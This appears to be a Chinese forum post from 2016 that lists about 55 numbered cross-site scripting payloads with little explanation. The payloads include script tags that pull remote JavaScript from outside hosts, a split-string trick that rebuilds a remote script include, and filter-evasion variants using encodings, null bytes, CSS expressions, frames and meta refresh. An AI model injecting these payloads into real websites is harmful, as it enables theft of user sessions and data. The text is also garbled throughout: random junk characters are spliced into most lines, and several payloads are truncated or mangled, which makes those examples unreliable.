(1)普通的XSS JavaScript注入
4 h+ N% C% Y4 e* ?) G9 Z4 `$ R f3 U<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 B; x. ~8 F( S9 x+ c% ~
(99)另类弹框8 S/ v2 t! P' W0 q7 O
<q/oncut=alert()>1
- @& G' M0 W0 f! U8 S; @2 x1 `<s/onclick=alert()>b3 i2 B4 |' A; H3 ~" J
<XSS=" onclick="alert(1)//">clickme</SSX=">
- \9 R" G( X" r, a p <zzz onclick=alert`1`>clickme</zzz> # x" p. C( z% d: C, T; x
<a onclick=alert`1`>clickme</a>
/ }9 q. }0 D6 }1 w# x& G3 b4 Q<a=">clickme</a=">
' x( \4 a+ W* L: C$ |! {( T3 h- p<a=">clickme</a>
* y$ \0 s% z/ K9 {/ Z: J<z=">clickme</z=">
4 Q. _: R. R# g4 C) X<z onclick=alert`1`>clickme</z>1 t9 r% \- l/ z1 U: t
1 ?6 X0 z# {/ `(2)IMG标签XSS使用JavaScript命令* W* J0 x7 Y4 n N& |2 }4 ^2 t" x$ F! Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! f5 N' n9 a) i) Y+ x
! f X4 i' m1 I7 F; h* x(3)IMG标签无分号无引号
9 e( u8 R8 w7 G<IMG SRC=javascript:alert(‘XSS’)>' m" S4 _! n, ^( }. d e2 L' @ M
& U: W, p _8 p M4 f
(4)IMG标签大小写不敏感
- x1 a6 a, m; K1 h/ z, j5 i7 @# @8 M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" G7 g9 X& \0 `* @ J& L
: F. g ~7 g$ C& u
(5)HTML编码(必须有分号)
3 D2 l0 M/ j9 x<IMG SRC=javascript:alert(“XSS”)> L# g8 e& l/ y
' j1 G7 A5 h4 \# ^. V+ ?5 m(6)修正缺陷IMG标签$ b0 n, ]5 x: e
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 m& O g4 [! {
4 Y5 j. E; W( | N6 r3 n(7)formCharCode标签(计算器). W0 O7 r% O: G# z( d% P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 O) A& L) b9 V4 W$ s, X0 P: p' d5 |2 r; l* A0 K1 S
(8)UTF-8的Unicode编码(计算器)- x0 ~9 \ n. v! ^
<IMG SRC=jav..省略..S')>
* t) j9 K: Y4 E3 W
5 {! G1 i4 I8 X7 h(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 ^: c$ ^* P. B3 F" P8 s. j7 C
<IMG SRC=jav..省略..S')>
$ O* q) f7 W5 `) f {7 {7 Q: Z; U% q% s- ?# y" f
(10)十六进制编码也是没有分号(计算器)
8 a- P# I4 P$ H' \5 f<IMG SRC=\'#\'" /span>3 y2 X+ I, k# `( l+ E
" G2 F* p) T2 _
(11)嵌入式标签,将Javascript分开
$ l; I2 k6 |( j6 c) ` f f' K: Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> K7 o1 e* m! _0 u
/ M& J$ o% d. n
(12)嵌入式编码标签,将Javascript分开/ ]! o4 }% w% ?
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>' K) y3 l. Z* F5 y+ k* M
* D" \4 k. }4 q3 B( \) l
(13)嵌入式换行符
% B. P3 T) W' }' Q& v# y( c<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& Y S- \/ R0 h/ t! F. }- i" U
6 k: n Z4 _ E: U6 p(14)嵌入式回车+ f: _! \! I1 [& R& C
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 s5 I2 ]8 s0 J- B4 x! [4 V9 D, r7 F$ H
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- `8 B, z, d0 n5 a% V! l<IMG SRC=\'#\'" /span>
9 _% {& ]9 \; e" E" V( x
! l' x- Z6 ^# ]1 W% S( E8 z# `) L L# D* k(16)解决限制字符(要求同页面)
' b3 W& K8 f0 F O<script>z=’document.’</script>
2 `, E, ?+ b1 ]& Q/ v( ~+ d<script>z=z+’write(“‘</script>
$ K; T0 h# u" B4 S<script>z=z+’<script’</script>
4 a& g! E' w% Y; I5 a% g; N<script>z=z+’ src=ht’</script>
4 V- K, O- C. M# z. J<script>z=z+’tp://ww’</script>
- g) U h: E& `5 C<script>z=z+’w.shell’</script>
, r3 N* }* x- Y6 m/ |, `9 A<script>z=z+’.net/1.’</script>2 c6 M9 ? Q# ]0 N8 R" x( {# o9 o
<script>z=z+’js></sc’</script>' [9 Y/ t% u- x8 {
<script>z=z+’ript>”)’</script>
: I. c( u7 `) u$ S) R2 L- f2 M<script>eval_r(z)</script>& k/ D, c% w7 \
; n6 B8 Q) W" w8 x' F; B W
(17)空字符8 y$ P2 E( ^' R* i
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out: I+ i8 y! T" Z0 K# u% b8 V3 @, E) R/ }
; D0 K3 b: O% N' k0 f
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' s2 p* l. L7 h9 c/ h, vperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
8 A% \( {2 y8 K/ [- `% [8 ?; X8 J0 A5 ]" C9 E8 r2 m
(19)Spaces和meta前的IMG标签5 z0 J% O s: E! o) W% @6 w# S. X
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>9 `8 j- C0 [; W! Y" O! ?
) R, E; X( z4 i' T! a(20)Non-alpha-non-digit XSS
$ M3 U% E9 W9 c) g# L7 x<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>+ H+ i# e1 T& X1 P* x$ l
4 h# y! g9 H3 T" |% ^) C5 `(21)Non-alpha-non-digit XSS to 2
" k! r+ z+ }& d) a7 }<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>. i M- O/ h W' B( b0 e5 M. {
4 D2 D1 [7 }* [2 W0 M$ _
(22)Non-alpha-non-digit XSS to 3
; H: r; g9 D1 H# h+ V<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
/ ?1 f/ [( r: H) l8 P. [2 M; l) j. U! \4 f5 S' _
(23)双开括号
0 m3 W# m( B6 L( _: z0 Z# x n. g<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 P5 }: q3 S& S3 I( a, Z2 q2 h' k/ g/ z: [5 G+ G
(24)无结束脚本标记(仅火狐等浏览器)- I) H; k( }7 R0 @ w2 Y8 i/ [
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 ~; ~3 Z: M1 F2 w6 Z! h
0 j. V& S2 r$ y: y4 f
(25)无结束脚本标记22 ]! s' g+ t& f8 \0 @! @# k
<SCRIPT SRC=//3w.org/XSS/xss.js>
3 m1 U" h" ], u/ }4 ]+ N$ x4 n! j: M' ^3 \" l2 C2 {/ }, d
(26)半开的HTML/JavaScript XSS
2 v, a+ g! m; E<IMG SRC=\'#\'" /span>- t o" D J5 L3 @( `! U) p" s% K3 e
% k1 u4 d" q6 O" @/ u/ W. B3 H(27)双开角括号
7 R6 p, w* l# Y) j7 R. N<iframe src=http://3w.org/XSS.html <" G. k( }( G; Q J# E9 s
( c2 N: [, D* V- }, m9 q3 A(28)无单引号 双引号 分号
! v5 |) |: } A' I+ u<SCRIPT>a=/XSS/+ `# X0 b* I" P% v+ Q0 [8 J
alert(a.source)</SCRIPT>
2 J# I# }- W2 D- |+ i2 E
! C3 l6 U; @3 W4 u# W( @; x' H(29)换码过滤的JavaScript
( m. a* S/ a) _- s& \6 I6 P0 y\”;alert(‘XSS’);//1 n& D$ ]" l2 [! l# K! c, X6 Q, D- g
3 {; f/ _, g3 X0 w(30)结束Title标签
! L8 c% U8 x1 e7 o( [' F8 ]5 B</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 G, E$ h6 w& X$ I- M
/ A, e9 ~$ L: w! F
(31)Input Image
) |+ A! E. P' D3 | z! X# z<INPUT SRC=\'#\'" /span>
0 e& @9 |$ L& R. |1 a: \# d. f' V1 E- O5 D# r; t4 n( h+ t
(32)BODY Image! c2 e' D! k- |9 l* g/ n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" h' b# f: r: i/ t8 G( Y, G
. H# r* o2 j& K& ]; E(33)BODY标签! U) @; M3 r ]2 N
<BODY(‘XSS’)>
& |# Q! a' ]3 s. I2 z
& l9 b" K% b; x1 e0 q4 G2 A7 [: Q! Y(34)IMG Dynsrc1 K" z1 Z( K8 x7 V
<IMG DYNSRC=\'#\'" /span>
3 k O% W% o+ l/ e& A# i, { [' \! x5 w4 _. C
(35)IMG Lowsrc+ {7 Q) J- q$ a% W- b
<IMG LOWSRC=\'#\'" /span>/ f& W' e( b M8 I
2 |7 o/ N( c- w% [' B
(36)BGSOUND& m4 ]3 y. X8 M% ?
<BGSOUND SRC=\'#\'" /span>) t: R7 p! _! S; ]2 {: T* z8 T
: S7 N) D1 r7 @* ^0 ]! j# f(37)STYLE sheet( V! D4 I7 F4 S
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ D% m2 U3 \. {' R2 d
9 F$ s8 O! G* h8 W8 T(38)远程样式表7 l5 S0 l2 t* G9 Z
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' u( h# M" `, W8 S6 x( L
5 g3 Y' M3 ?9 S( R8 W(39)List-style-image(列表式)2 j6 P. P9 @2 ?- r( r# ~. O
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 F8 S- b& w4 g: K8 Q9 @# z) T; z0 r2 }8 Y; _. z; {
(40)IMG VBscript+ ]0 Q7 r/ ]4 o( _/ m1 b- d
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! Y$ }& p; R ?9 c+ w; R Q# f" }- q4 M/ p$ J, F. {
(41)META链接url7 m5 A; z$ F8 F" r* e0 x8 B3 h
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>/ x2 E L. k8 G9 D4 ?
1 A5 ]) s( R& _& {* t
(42)Iframe( {. |% R( ^/ p/ Q. l( f+ C H
<IFRAME SRC=\'#\'" /IFRAME>8 o- H% g4 Y; ]3 m7 y
" x# ^/ I' t2 ^! Y* k+ a$ }
(43)Frame3 l, o8 n7 R$ j9 `
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
8 Z- A+ e7 k7 W; t; ]
9 \1 Q/ y3 X8 A F(44)Table/ _0 J( o1 {: {2 S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
H4 f8 q" i2 l; v2 ^
2 h* {8 K/ w7 u8 q" N- f(45)TD
6 F8 ?0 i2 D$ S. g2 z! @<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 N$ r3 M4 t4 @& V1 q5 j
7 D3 d" F# P' o1 ]7 Y& u(46)DIV background-image: `& K4 T4 s9 o# s m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! R& D' A3 S" L6 S. }
$ M9 t' e& K* R# v
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) }5 a" z. c l/ P4 r) O9 E<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”># X' [' i* z7 | k" X* \5 n3 N# u
) U" m& Z* \6 V# H$ w8 J9 Y(48)DIV expression
2 D# n2 T1 ?0 z5 D/ i; ]' \& r. X<DIV STYLE=”width: expression_r(alert(‘XSS’));”>( T0 ~: _6 p# S% F0 ?: j
4 m" I( U H7 j6 i5 h9 F* ^(49)STYLE属性分拆表达
. x* d) M1 P& X. m<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 @- }) H# ^9 l8 ], e
: W: _" d$ I1 j+ }
(50)匿名STYLE(组成:开角号和一个字母开头)' u7 f5 T. S7 y' x+ [. q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. C1 J& c( g5 R- ]5 F0 Y4 U
9 V" ]# v; H0 K I8 n( T(51)STYLE background-image! d2 Q0 j3 Q3 t5 n1 _: [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, }2 ?7 }: G+ J1 w
1 f9 S+ ^ i( f8 A, D N T
(52)IMG STYLE方式
! D5 b4 e+ h6 t. i+ oexppression(alert(“XSS”))’>
4 ^) X6 I) i! \4 k1 t( ~+ z' e* f/ C3 N3 ~0 g
(53)STYLE background
' M. U, p& b6 f* r1 e+ n7 n<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* q# k! r; \- L7 d: P4 W. N6 }3 w8 b: F f% |* O
(54)BASE
. P. g7 o, P; ^/ Y( ]<BASE HREF=”javascript:alert(‘XSS’);//”>
; @- B% I9 F2 M* X% v# I! E0 J% [3 ?- F# {# i5 }3 J4 e( ]5 Y0 L ]
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; @. e, d7 J- T9 A& z
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
/ J0 `8 e4 U: g- |. a, q/ ? |
发表于 2016-4-28 10:06:15
收藏
支持
反对